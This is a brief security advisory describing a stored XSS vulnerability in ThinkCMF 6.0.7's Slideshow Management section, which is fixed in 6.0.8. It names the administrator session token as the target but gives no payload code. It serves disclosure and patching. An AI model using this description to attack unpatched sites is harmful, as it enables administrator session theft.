ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).
| Package (Ecosystem) | Introduced | Fixed | Limit |
|---|---|---|---|
| thinkcmf/thinkcmf(Packagist) | 0 | 6.0.8 | N/A |
CVSS Metrics
